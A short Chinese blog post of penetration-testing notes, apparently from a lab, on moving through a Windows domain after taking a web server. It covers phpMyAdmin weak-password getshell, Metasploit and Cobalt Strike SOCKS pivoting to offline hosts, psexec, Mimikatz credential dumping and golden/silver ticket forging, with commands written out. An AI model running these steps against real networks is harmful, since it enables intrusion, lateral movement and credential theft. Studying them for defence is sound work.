內網滲透-域內有網和無網
阿新 • • 發佈:2020-10-19
文章目錄
前言
在滲透測試的過程中,拿下域內一臺主機以後,有時候內網的其他主機有網,有時候沒網,此時,如果有網我們就按常規的滲透測試即可,如果沒網我們就應該以該主機作為跳板,使用socks協議或其他辦法,從而實現與無網的主機進行通訊
域內主機有網
攻擊流程
通過域環境webserver主機的外網WEB服務開啟到域控許可權的獲取
假如已經獲取webserver許可權:
0x01:
- 通過phpmyadmin弱口令getshell
0x02:
- msf生成 msf監聽 getsystem upload ‘/root/x64’ c:\test mimikatz
0x03:
- 批處理wmicexec測試弱口令 29 31 32 IP存在
0x04:
- 獲取29 31 32許可權 反彈msf getsystem
0x05
- 批處理wmicexec測試弱口令 21中標
- execute -f cmd.exe -H -i 0x06
- 匯出所有hash 進行黃金白銀票據
域內主機無網
Msf
- 拿下weserver,發現有兩個網段,192.168.3.31 192.168.230.131
假設192.168.230.131為外網,192.168.3.31為內網 - 又發現內網其他主機都沒有聯網,只有webserver聯網了。
- 此時,可以用webserver作為跳板,用cs開啟socks,並用msf
操作流程
#cobalt strike
- 啟動,監聽,生成,上線,提權
- cs啟動sockt4 生成監聽埠跳板,將setg Proxies
- socks4:192.168.230.133:xxxxx複製到msf
msfconsole
- 載入代理:setg Proxies socks4:192.168.230.133:xxxxx
- 攻擊模組:ms17010 ms14068 smb psexec等
- use exploit/windows/smb/psexec
#自己繫結自己,就實現了無網探針
- set payload bind_tcp
- set smbuser administrator
- set smbpass [email protected]#45
- 上傳mimikatz:upload ‘/root/x64’ c:\test
- mimikatz privilege::debug sekurlsa::logonpasswords